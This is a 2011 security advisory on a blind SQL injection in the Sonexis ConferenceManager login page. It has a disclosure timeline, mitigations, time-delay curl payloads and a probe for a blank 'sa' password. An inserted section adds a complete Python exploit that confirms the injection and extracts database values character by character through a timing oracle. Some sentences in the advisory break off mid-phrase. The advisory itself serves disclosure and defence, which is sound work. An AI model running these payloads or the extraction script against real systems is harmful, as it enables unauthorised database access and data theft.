
Sonexis ConferenceManager Blind SQL Injection

Posted Apr 10, 2011
Authored by Adriel T. Desautels, Netragard | Site netragard.com

Netragard, L.L.C Advisory - Sonexis ConferenceManager version suffers from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 1f9f92a63ad712d5bdad484011567b4dc9edf18843008ce146b3c460e4a79e40

*************************** NETRAGARD ADVISORY ************************
Research Driven Penetration Testing

If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated. The advisory can be found on the
Netragard website at http://www.netragard.com/

For more information about Netragard visit http://www.netragard.com

[Advisory Information]
Contact : Adriel T. Desautels
Advisory ID : NETRAGARD-20110910 (Corrected)
Researcher : Kevin Finisterre & Team
Product Name : Sonexis ConferenceManager
Product Version : (Tested On)
Vendor Name : Sonexis Technology, Inc.
Type of Vulnerability : Blind SQL Injection
Impact : Critical
Date Discovered : 01/19/2011
Vendor Notified : 01/26/2011

[Notes About This Advisory]
Netragard's team discovered and exploited this vulnerability on January
19th 2011 during the delivery of research based penetration testing services.
Netragard notified the vendor about this vulnerability on January 26th 2011.
Netragard did not receive any communications back from Sonexis after initial

According to Solutionary's own advisory, Solutionary independently
discovered the same vulnerability on 01/27/2011, notified Sonexis on
02/18/2011 and received a vendor response on 03/02/2011. Solutionary
published a low detail advisory for this issue on

It is Netragard's policy to refrain from publishing vulnerabilities
until after methods for remediation have been created/provided. Exceptions
to this policy are made in the event that vendors are non-responsive or in
the event that the vulnerability becomes public knowledge.

[Product Description]
"The Sonexis ConferenceManager offers unbeatable value. Our high-quality
audio platform is recognized for its ease-of-use, security, and
cost-effectiveness — and it offers a comprehensive set of integrated Web
conferencing capabilities. Better still, our unique architecture allows you
unlimited flexibility. You're never more than a license key away from
increasing users, adding Web functionality, or changing from one protocol
to another. Simply put, it's the best thing to happen to conferencing."

Taken From:

[Technical Summary]
The Sonexis ConferenceManager does not adhere to best practices as defined
by the Open Web Application Security Project (OWASP), the de facto standard
for Web Application Security. Specifically, the Sonexis ConferenceManager
fails the OWASP Data Validation Criterion as well as others that are not
discussed in this advisory.

This advisory discloses details about a Blind SQL Injection vulnerability
that was discovered by Netragard during the delivery of research driven
penetration testing services. Successful exploitation of this
vulnerability enables the attacker to take full control of the affected
system. Netragard has created and will provide Proof of Concept code for
this vulnerability shortly after the publication of this Advisory.

Netragard has not received any information from the vendor since initial
notification. As of the time of the authoring of this Advisory no official
vendor patches have been made public. Netragard has provided methods for
mitigation in this advisory.

For more information about OWASP criterion please visit the URL Below:

--> https://www.owasp.org/index.php/Category:Vulnerability <--

[Technical Details]
The tests shown below can be used to determine if your Sonexis
ConferenceManager is vulnerable.

Test Environment:
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000

--- TEST 1 ---
Validated SQL command execution with the "waitfor+delay+'0:0:3'--" SQL
command. If command execution is a success then time should return a
"real" value of roughly 3 seconds.

netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:3'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real 0m3.281s <--- Command Execution Successful!
user 0m0.000s
sys 0m0.004s
--- END TEST 1 ---

--- TEST 2 ---
Validated SQL command execution with the "waitfor+delay+'0:0:5'--" SQL
command. If command execution is a success then time should return a
"real" value of roughly 5 seconds.

netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:5'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real 0m5.277s <--- Command Execution Successful!
user 0m0.001s
sys 0m0.003s
--- END TEST 2 ---

--- TEST 3 ---
Validated SQL command execution with the "waitfor+delay+'0:0:10'--" SQL
command. If command execution is a success then time should return a
"real" value of roughly 10 seconds.

netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:10'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real 0m10.280s <--- Command Execution Successful!
user 0m0.002s
sys 0m0.004s
--- END TEST 3 ---

--- TEST 4 ---
This test checks for a blank "sa" password on the MsSQL database. The
injected statement makes SQL Server connect back to itself through
OPENROWSET as "sa" with an empty password. If that login succeeds the
WAITFOR DELAY runs and the response is delayed by 10 seconds; if the
password is set the OPENROWSET call fails with an error before the
WAITFOR is reached and the response returns without delay. Note that the
probe also returns without delay when ad hoc distributed queries
(OPENROWSET) are disabled on the instance, so a fast response proves
only that this particular path is closed, not that the password is set.
The same command is shown twice, run against a host where the password
is set and against one where it is blank.

netragard:~$ time curl -d "txtConferenceID=1';if (SELECT 1 from OPENROWSET('SQLoledb','server=;uid=sa;pwd=', 'select 1')) = 1 waitfor+delay'0:0:10';--" \
    "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real 0m0.305s <-- Password is set (no delay).
user 0m0.003s
sys 0m0.001s

netragard:~$ time curl -d "txtConferenceID=1';if (SELECT 1 from OPENROWSET('SQLoledb','server=;uid=sa;pwd=', 'select 1')) = 1 waitfor+delay'0:0:10';--" \
    "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real 0m10.101s <-- Password is not set (delay).
user 0m0.002s
sys 0m0.003s
--- END TEST 4 ---
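The four tests above are one procedure: an unconditional WAITFOR DELAY establishes that injected T-SQL runs, and a conditional one turns the delay into a yes/no oracle. The script below is an added example (not the advisory's Proof of Concept and not Netragard's code) that automates both. It reproduces Tests 1-3 with proper form encoding and a baseline measurement, so that a server that is merely slow is not mistaken for a vulnerable one, and it generalizes the Test 4 pattern into a character-by-character extractor driven by the same conditional delay. The field name, page path and placeholder host come from the advisory; the target URL, the jitter allowance, the SELECT SYSTEM_USER query and the simulated oracle used for offline runs are assumptions of this example.

```python
"""Time-based blind SQL injection probes for the hostlogin.asp txtConferenceID
parameter from the advisory. Added example, not Netragard's PoC.
Assumptions not taken from the advisory: the target URL is supplied by the
caller, the jitter allowance (SLACK), the queries passed to extract_string,
and the simulated oracle used for offline runs."""
import re
import time
import urllib.error
import urllib.parse
import urllib.request

FIELD = "txtConferenceID"  # parameter named in the advisory
SLACK = 1.0                # seconds of jitter tolerated on top of baseline (assumed)


def delay_payload(seconds, condition=None):
    """Form body for one probe. Without a condition this is Tests 1-3
    (unconditional WAITFOR); with one it is the Test 4 shape, IF (...) WAITFOR.
    urlencode() percent-encodes quotes, spaces and semicolons, so the server
    decodes exactly the T-SQL built here."""
    delay = "WAITFOR DELAY '0:0:%d'" % seconds
    if condition is None:
        sql = "1' %s--" % delay
    else:
        sql = "1'; IF (%s) %s;--" % (condition, delay)
    return urllib.parse.urlencode({FIELD: sql})


def timed_post(url, body, timeout=60.0):
    """POST body to url; return wall-clock seconds until the response is read
    (the 'real' figure from the advisory's `time curl`). An HTTP error page is
    still a timed answer: a failed OPENROWSET login raises a T-SQL error."""
    req = urllib.request.Request(url, data=body.encode(), method="POST",
                                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass
    return time.perf_counter() - start


def delays_confirmed(baseline, observed):
    """observed maps requested delay -> measured seconds. Injection is confirmed
    only if every probe took at least its requested delay and no more than
    delay + baseline + SLACK, for at least two distinct delays: a server that
    is simply slow (every request ~5 s) or fast (never delayed) fails."""
    if len(observed) < 2:
        return False
    return all(req <= got <= req + baseline + SLACK for req, got in observed.items())


def confirm_injection(url, delays=(3, 5, 10)):
    """Tests 1-3 of the advisory: does response time track the requested delay?"""
    baseline = timed_post(url, urllib.parse.urlencode({FIELD: "1"}))
    return delays_confirmed(baseline, {d: timed_post(url, delay_payload(d)) for d in delays})


SA_BLANK_PASSWORD = ("(SELECT 1 FROM OPENROWSET('SQLoledb',"
                     "'server=;uid=sa;pwd=','select 1')) = 1")   # the Test 4 condition


def char_gt(query, pos, threshold):
    """T-SQL predicate: is character pos (1-based) of the scalar result of
    query above ASCII threshold? Past the end SUBSTRING yields '' and ASCII('')
    is NULL, so the predicate is never true there."""
    return "ASCII(SUBSTRING((%s),%d,1)) > %d" % (query, pos, threshold)


def extract_string(oracle, query, max_len=32):
    """Recover the (ASCII) result of query through a conditional-delay oracle:
    binary search over 0..127, about seven timed requests per character."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(char_gt(query, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # NULL / empty: end of string
            break
        out.append(chr(lo))
    return "".join(out)


def http_oracle(url, seconds=5):
    """Oracle answering one IF(...) WAITFOR probe: True if the delay fired."""
    return lambda condition: timed_post(url, delay_payload(seconds, condition)) >= seconds


def simulated_oracle(secret):
    """Offline stand-in for http_oracle over a constructed secret string; it
    parses pos and threshold back out of the predicate char_gt() produced."""
    def ask(condition):
        m = re.search(r",(\d+),1\)\) > (\d+)$", condition)
        pos, threshold = int(m.group(1)), int(m.group(2))
        return pos <= len(secret) and ord(secret[pos - 1]) > threshold
    return ask


if __name__ == "__main__":
    target = "http://xxx.xxx.xxx.xxx/login/hostlogin.asp"  # placeholder host from the advisory
    if confirm_injection(target):
        ask = http_oracle(target)
        print("sa password blank:", ask(SA_BLANK_PASSWORD))
        print("application db login:", extract_string(ask, "SELECT SYSTEM_USER"))
```

Against a live host every extracted character costs about seven timed requests, so the oracle delay should be longer than the server's normal worst-case response time; `simulated_oracle` lets the extraction logic be exercised without a target.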

Exploitation Difficulty : Trivial
Risk : Complete System Compromise, Distributed
Metastasis, Access To Sensitive Data, etc.

[Proof Of Concept]
Netragard created a Proof of Concept exploit for this vulnerability that
will be published on Netragard's website shortly after the release of
this advisory.

[Vendor Status and Chronology]

01/19/2011 - Vulnerability Discovered and Exploited by Netragard, LLC.
01/26/2011 - Vendor Notified of the Vulnerability by Netragard, LLC.
01/27/2011 - Vulnerability Discovered by Solutionary.
02/18/2011 - Vendor Notified of the Vulnerability by Solutionary.
03/02/2011 - Vendor Responds to Solutionary.
04/06/2011 - Solutionary publishes a low detail advisory with no mitigation.
04/10/2011 - Netragard publishes high detail advisory with mitigation.

Until a vendor fix is available this vulnerability can be mitigated by
filtering application requests with a Web Application Firewall, or with
custom request filtering in the Web Server configuration.

The tests above also point to database-side controls that limit what a
successful injection can do: set a non-blank "sa" password, run the
application under a low-privileged SQL Server login rather than "sa", and
disable ad hoc distributed queries (OPENROWSET/OPENDATASOURCE) on the
instance if the application does not need them.

Note: Mitigation does not constitute a proper fix. If an attacker is able
to circumvent mitigation techniques then exploitation is still possible.
An example of Web Application Firewall subversion can be found at the
following URL: http://pentest.netragard.com/?p=10

The proper fix is for the vendor to review the Sonexis ConferenceManager
source code, replace SQL built by string concatenation with parameterized
queries, and ensure that the code adheres to the OWASP criterion.

Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
